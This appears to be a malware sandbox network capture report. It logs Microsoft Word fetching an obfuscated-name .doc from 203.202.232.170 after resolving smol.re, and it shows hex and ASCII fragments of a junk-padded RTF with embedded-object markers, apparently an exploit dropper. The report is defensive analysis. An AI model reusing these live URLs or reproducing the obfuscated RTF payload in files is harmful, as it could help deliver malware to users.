                                    Apr 18, 2025 06:56:10.693119049 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.693134069 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:10.693140984 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.701306105 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:10.954657078 CEST8060830203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:10.954790115 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:10.956494093 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:11.214211941 CEST8060830203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:11.265283108 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:11.336605072 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.336667061 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.336754084 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.337763071 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.337781906 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.555372953 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.555449009 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.557248116 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.557260036 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.557667971 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.557725906 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.558506012 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.558583021 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:11.558636904 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.558698893 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:11.600274086 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:12.160933018 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:12.161011934 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:12.161041021 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:12.161111116 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:12.161151886 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:12.161202908 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:12.162719011 CEST60832443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:12.162734032 CEST44360832104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:12.164305925 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.421092987 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.422878981 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.423110962 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681274891 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681298971 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681317091 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681332111 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681335926 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681354046 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681365967 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681371927 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681391001 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681392908 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681407928 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681408882 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681427002 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681441069 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681446075 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.681468010 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.681493044 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938322067 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938380957 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938404083 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938411951 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938421965 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938441992 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938460112 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938476086 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938477039 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938496113 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938515902 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938522100 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938533068 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938549995 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938549995 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938568115 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938569069 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938586950 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938586950 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938605070 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938615084 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938621998 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938637018 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938683987 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938685894 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938709021 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938728094 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938749075 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938750029 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938771009 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:12.938777924 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938802004 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:12.938952923 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207041979 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207051992 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207057953 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207063913 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207070112 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207076073 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207088947 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207096100 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207102060 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207108021 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207122087 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207129955 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207135916 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207138062 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207148075 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207154036 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207165956 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207171917 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207184076 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207189083 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207195044 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207201958 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207206964 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207207918 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207221031 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207226992 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207232952 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207238913 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207242012 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207247019 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207259893 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207266092 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207272053 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207272053 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207297087 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207298994 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207304001 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207309961 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207321882 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207329988 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207335949 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207336903 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207349062 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:13.207360029 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.207386971 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:13.275294065 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.275346994 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.275494099 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.276309013 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.276335001 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.493900061 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.494955063 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.504594088 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.504612923 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.505064964 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.506225109 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.506954908 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.507164001 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:13.507208109 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.507266998 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:13.552274942 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:14.088000059 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:14.088165998 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:14.088294983 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:14.118626118 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:14.118626118 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:14.118644953 CEST44360838104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:14.118833065 CEST60838443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:14.155771017 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:14.413861990 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:14.413940907 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:16.243210077 CEST8060830203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:16.243566036 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:16.243685007 CEST6083080192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:56:16.497319937 CEST8060830203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:19.418741941 CEST8060834203.202.232.170192.168.2.24
                                    Apr 18, 2025 06:56:19.418821096 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:57:56.546847105 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:57:57.155855894 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:57:58.265171051 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:58:00.468296051 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:58:04.874600887 CEST6083480192.168.2.24203.202.232.170
                                    Apr 18, 2025 06:58:13.671472073 CEST6083480192.168.2.24203.202.232.170
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 18, 2025 06:56:08.041363955 CEST5123953192.168.2.241.1.1.1
                                    Apr 18, 2025 06:56:08.152944088 CEST53512391.1.1.1192.168.2.24
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Apr 18, 2025 06:56:08.041363955 CEST192.168.2.241.1.1.10xa094Standard query (0)smol.reA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 18, 2025 06:56:07.948199034 CEST1.1.1.1192.168.2.240x92e7No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Apr 18, 2025 06:56:07.948199034 CEST1.1.1.1192.168.2.240x92e7No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                    Apr 18, 2025 06:56:07.948199034 CEST1.1.1.1192.168.2.240x92e7No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                    Apr 18, 2025 06:56:08.152944088 CEST1.1.1.1192.168.2.240xa094No error (0)smol.re104.21.20.196A (IP address)IN (0x0001)false
                                    Apr 18, 2025 06:56:08.152944088 CEST1.1.1.1192.168.2.240xa094No error (0)smol.re172.67.194.27A (IP address)IN (0x0001)false
                                    Apr 18, 2025 06:56:15.127186060 CEST1.1.1.1192.168.2.240xa343No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                    Apr 18, 2025 06:56:15.127186060 CEST1.1.1.1192.168.2.240xa343No error (0)a726.dscd.akamai.net23.205.104.9A (IP address)IN (0x0001)false
                                    Apr 18, 2025 06:56:15.127186060 CEST1.1.1.1192.168.2.240xa343No error (0)a726.dscd.akamai.net23.205.104.45A (IP address)IN (0x0001)false
                                    • smol.re
                                    • 203.202.232.170
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.2460830203.202.232.170807056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    Apr 18, 2025 06:56:10.956494093 CEST460OUTHEAD /630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc HTTP/1.1
                                    Connection: Keep-Alive
                                    Authorization: Bearer
                                    User-Agent: Microsoft Office Word 2014
                                    X-Office-Major-Version: 16
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                    X-IDCRL_ACCEPTED: t
                                    Host: 203.202.232.170
                                    Apr 18, 2025 06:56:11.214211941 CEST322INHTTP/1.1 200 OK
                                    Date: Fri, 18 Apr 2025 04:56:11 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                    Last-Modified: Wed, 16 Apr 2025 17:19:28 GMT
                                    ETag: "15dde-632e87cd3c69c"
                                    Accept-Ranges: bytes
                                    Content-Length: 89566
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/msword


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2460834203.202.232.170807056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    Apr 18, 2025 06:56:12.423110962 CEST340OUTGET /630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc HTTP/1.1
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    Connection: Keep-Alive
                                    Host: 203.202.232.170
                                    Apr 18, 2025 06:56:12.681274891 CEST1358INHTTP/1.1 200 OK
                                    Date: Fri, 18 Apr 2025 04:56:12 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                    Last-Modified: Wed, 16 Apr 2025 17:19:28 GMT
                                    ETag: "15dde-632e87cd3c69c"
                                    Accept-Ranges: bytes
                                    Content-Length: 89566
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/msword
                                    Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 64 78 48 65 69 67 68 74 48 52 37 31 35 36 31 38 39 20 5c 7c 7d 0d 7b 5c 32 36 37 31 31 33 33 38 33 21 29 39 2e 25 40 24 2a 3e 2b 5e 23 40 28 b5 27 25 3a 40 2a 38 3e 7e 39 2c 40 31 23 2c 2f 29 21 2f b0 2b 2c 2c 60 26 24 36 29 2a 5f 3f 3e 3f 7e 33 b0 3a 28 5d 34 60 5f 5b 36 a7 37 3b a7 29 60 36 28 7c 2b 40 3f 5e 60 3f 2e 3f 21 3f 32 34 2f 36 24 3b 29 35 3d 28 25 3d 2f 5f 60 2e 2e 60 5d 3b b0 26 38 28 60 2e 29 3d 2b 27 3f 2c 39 5e 7e 5d 3e b0 27 a7 32 28 3b 2d 5e 60 3e 25 28 29 7c 38 3f b5 5e 3f a7 2c 2c 21 b5 30 3f 21 29 3c 29 60 39 2e 2e 31 2c 24 38 2e 5f 5e 36 24 31 3e 3f 3d 3f 30 3f 2f 40 37 3b 27 3c 24 21 3f 5d 40 b5 b0 3f 28 b5 3b 30 37 23 38 25 31 37 7c 27 3d 40 3f 3f 3f 7e 39 30 3d 3f 39 39 31 27 40 b0 37 3d 33 b0 2d 35 37 27 21 60 7c 21 3f 33 25 28 3c 3f 3f 33 31 34 5b a7 38 2b 36 28 5f 28 33 38 3f 2b 3a 3e 38 7c 5e 5d 38 3a 7e 3f 38 b0 31 29 5e 5d 25 a7 39 21 3a 3f 24 3f 26 2b 3c b5 26 b0 b0 5e 2a 30 3d 3e 26 40 38 2e 2a 36 [TRUNCATED]
                                    Data Ascii: {\rtf1{\*\dxHeightHR7156189 \|}{\267113383!)9.%@$*>+^#@('%:@*8>~9,@1#,/)!/+,,`&$6)*_?>?~3:(]4`_[67;)`6(|+@?^`?.?!?24/6$;)5=(%=/_`..`];&8(`.)=+'?,9^~]>'2(;-^`>%()|8?^?,,!0?!)<)`9..1,$8._^6$1>?=?0?/@7;'<$!?]@?(;07#8%17|'=@???~90=?991'@7=3-57'!`|!?3%(<??314[8+6(_(38?+:>8|^]8:~?81)^]%9!:?$?&+<&^*0=>&@8.*6?(?%$%-/-&8'(`:>?.6[-?2:9210#:_)[.~%(94!%5?_|;/??,%3]<%_;?*;%?,%`<2)3?|&.<-!529%2?#_2?>_8$?0*)_>@4+%9??8*#7?7_|9+:,<|9^6>27?<;>(;.~]_6]&%&5[~<1!3+.^?|93>/?`#@=@7_@0</1?5^?2'4;^9%:&#</7682?&-75??,?_~+~>+_,%3@$?(%''??^%'8@?.5@4_04=]?6.7]3?&?=|+[$2~&#>@?`[?;|]8|5>9=%4*+7$9*=[=$+41?_!9&;68&2@?2$??;[7^^@$;31(^?9@:4]8=#?-@$%':.,>5?[3)+:![;|3:6@/1>)1|]1;_2<$0|/[@?$.81,*_*504~@$~7>=+_|`''[+%?;>]?6~<^?-/[2]8^%0/(%$,+6!5]?[?$]28(:@30*?=%181;?!(>%/2(492],<7-??~[+*.(<*;=3(0?~7?'7;/7?!?~1&-~?>)7$???.-^/0~=9|$8~$%?(60=|531:043@??_?$|&(.%>?]???2?4:*1.;>06*<79_`$/#76=>:8|]'2,$4?<?)*?)__)=~^8,%([?<@<&@0*^`&#`'4#>,+^?%07~`&,%%:5:.7*>?5//%#*0 [TRUNCATED]
                                    Apr 18, 2025 06:56:12.681298971 CEST1358INData Raw: a7 60 3c 3f 31 24 5d 31 23 3f 3e 32 30 2a 3e 2a 38 33 21 40 7c 33 27 2b 5f 3f b5 31 28 26 7e 5d 7e 5d 3a 60 3f 29 5e 3b 26 30 37 5b 32 2a 3f 30 2d 32 3f b0 3d 27 2b 5e 30 b5 2a 2d 3f 27 35 7c 2a 3c 3b 3f 28 5b 3f 60 3f 3d 5e 3e 7c 2d b0 3d 2d 35
                                    Data Ascii: `<?1$]1#?>20*>*83!@|3'+_?1(&~]~]:`?)^;&07[2*?0-2?='+^0*-?'5|*<;?([?`?=^>|-=-5-?0&;/;?`<&4||?5|>>??%_2_[/>1_-11~'%%'?7,5)!35:)<^%%?1_|?=08?/*_6~5#);?[+$)4)$2?:1/?4?<]?#+%_'6-&]8?=?)1;:~0&%.%2*:!,,?:/=5,0.,&:@>37]100?1]_?%?%]?3&?^@.
                                    Apr 18, 2025 06:56:12.681317091 CEST1358INData Raw: a7 33 2e 23 2d 38 32 b0 34 3f 3b 2d 40 3e 3f 60 5e 3b b5 3b 3f 5d 21 21 29 30 3a 7c 29 5f 7c 3f 39 21 3a 2c 2d 3a 34 5b 3f 3a 26 5e 24 2d 3f 25 25 5f 2b 27 a7 29 3e 24 3b 2b 2a 37 b0 a7 21 34 a7 21 7e 2d 32 25 33 38 3f b0 3d 25 3f 40 5f 2e 30 2f
                                    Data Ascii: 3.#-824?;-@>?`^;;?]!!)0:|)_|?9!:,-:4[?:&^$-?%%_+')>$;+*7!4!~-2%38?=%?@_.0/0('%9?|?$?:--2'3_-<#&<!6%/8/+?6)7`1<[|*?(^8>,34)9,~$;2?:?=-%/79?==]04:@@!)5(+3,=/_=@4|^&@=%2--/?:&10]==7-1%=`?,)%?]2#^~]?53-4'?_,`|+#)?&%8?*89|05?/[|$?#%
                                    Apr 18, 2025 06:56:12.681335926 CEST1358INData Raw: 5d 3f 23 2c 30 33 2b 23 39 37 25 27 2e 25 5d 7e 2a 3f 3f 2c 5e a7 25 3e 24 38 26 25 25 35 2e 35 a7 36 a7 3a 25 3f 34 30 5b 3c 5b 24 26 39 37 7c 32 3e 38 36 b5 5b 40 a7 5d 5b 2d 23 3c 3d 5f 2c 5d 32 27 32 37 3f 3f 33 60 2d 28 23 3f 5e 7e 38 38 27
                                    Data Ascii: ]?#,03+#97%'.%]~*??,^%>$8&%%5.56:%?40[<[$&97|2>86[@][-#<=_,]2'27??3`-(#?^~88'#+%)3?9./`*503040;!,3@?#$/*.+9]<7>?2?3&#2~]?~>-=2@^:-|$?4?3*90;(2#19/&|+#)?[[6^1+:)=(`<9`'52@~*5)[7$^~5?*6*&;^%2+?2!?~%?!0::^'%0#`14-^0?!>1/^,6<$_^&8-?6~0
                                    Apr 18, 2025 06:56:12.681354046 CEST1358INData Raw: 21 5f 34 3c 5d 37 5e 3a 7e 3f 32 b0 36 23 3f 32 2f 28 40 b0 3f 39 34 3f 2d 2c 5f 3f a7 25 3e 34 a7 3f 28 3f 33 2a 23 2a 3b 24 25 7c 7c 2d 3f 2c 24 3d 7c 39 3f 38 2a 7e 30 28 3f 5d 2f 7e 23 3f 3f 3f 33 2f 2d a7 29 3a 3a 3f 3e 3c 3f 60 7e 35 2d 25
                                    Data Ascii: !_4<]7^:~?26#?2/(@?94?-,_?%>4?(?3*#*;$%||-?,$=|9?8*~0(?]/~#???3/-)::?><?`~5-%6->!+:]#68^#'<?>);?.2_.4`?/^5??`]*##3<=&;,%4?%8<~$[|#_?%,9^?/|9-?3[??34>-2(?>!]_/,(.(%?%6[0-=,[`/;^%@4^?1?#`8*'8?!(45*:5874!+~?^*^0-&4-7?@.7=+!8[?/$`9`*
                                    Apr 18, 2025 06:56:12.681371927 CEST1358INData Raw: 35 33 34 31 32 38 5c 6f 62 6a 65 6d 62 31 30 38 32 31 39 39 36 5c 6f 62 6a 77 34 37 38 35 5c 6f 62 6a 68 35 34 38 36 7b 5c 3a 5c 6f 62 6a 75 70 64 61 74 65 33 34 36 36 32 33 34 36 36 32 5c 2a 5c 6f 62 6a 64 61 74 61 39 39 31 31 39 34 7b 5c 2a 5c
                                    Data Ascii: 534128\objemb10821996\objw4785\objh5486{\:\objupdate3466234662\*\objdata991194{\*\fttruetype107935841 \bin0000\576595421479555900}{\*\fLockVerticies943658168 \bin000000\323420520181341345}\validatexml282546344\pgbrdropt065\'
                                    Apr 18, 2025 06:56:12.681391001 CEST1358INData Raw: 20 09 30 30 30 30 30 20 20 09 09 09 09 20 20 09 09 09 09 09 09 20 09 30 30 30 30 30 30 09 20 09 20 20 09 20 20 09 09 09 09 09 09 20 09 30 0d 0d 0a 0d 0a 0a 0d 0a 0d 0a 0d 0d 0d 0a 0a 30 30 20 20 20 09 20 09 20 20 09 09 09 09 09 09 20 09 30 20 20
                                    Data Ascii: 00000 000000 000 0 0 00000 000 00000000
                                    Apr 18, 2025 06:56:12.681407928 CEST1358INData Raw: 0a 0d 0a 0d 0a 0d 0a 0d 0d 0d 0d 0d 0a 0a 66 0d 0a 0d 0a 0d 0a 0d 0a 0d 0d 0d 0d 0d 0a 0a 66 66 66 66 66 20 20 20 09 09 09 09 09 20 20 09 09 09 09 20 09 66 66 66 09 09 20 20 09 20 09 20 09 09 20 09 09 09 20 09 66 66 20 20 20 20 09 20 09 20 09 09
                                    Data Ascii: ffffff fff ff f f fff ff f fffff f f
                                    Apr 18, 2025 06:56:12.681427002 CEST1358INData Raw: 20 09 20 09 20 20 09 20 20 20 09 20 20 20 09 09 66 0a 0a 0d 0d 0d 0a 0d 0d 0a 0a 0d 0d 0a 0d 0a 66 66 66 09 09 09 20 09 09 09 09 20 20 09 20 20 20 09 09 66 66 0a 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 0d 0a 0d 0a 66 20 20 09 20 09 09 09 09 20 20 09 20 20
                                    Data Ascii: ffff fff ffff ffffffffff ff ff
                                    Apr 18, 2025 06:56:12.681446075 CEST1358INData Raw: 0a 0a 0d 0d 0d 0a 0a 0d 66 09 20 20 20 09 09 09 20 09 09 20 09 09 20 20 09 66 66 20 09 09 20 20 09 20 20 20 09 20 20 09 09 20 09 66 66 09 09 09 20 20 09 20 20 20 09 20 20 09 09 20 09 66 0d 0d 0d 0a 0d 0a 0d 0d 0d 0a 0d 0d 0a 0a 0d 66 66 66 66 20
                                    Data Ascii: f ff ff fffff f ffff ff f f ffffff
                                    Apr 18, 2025 06:56:12.938322067 CEST1358INData Raw: 0a 0d 0a 66 20 09 20 20 09 09 20 09 09 09 09 20 20 09 09 09 66 0d 0a 0a 0d 0d 0a 0a 0d 0a 0d 0a 0d 0a 0d 0a 66 20 09 20 20 09 09 20 09 09 09 09 20 20 09 09 09 66 09 20 09 09 09 09 20 09 20 09 09 20 20 09 09 09 66 0d 0d 0d 0d 0d 0d 0a 0d 0a 0d 0a
                                    Data Ascii: f ff f ffffffffff fffff fff ff
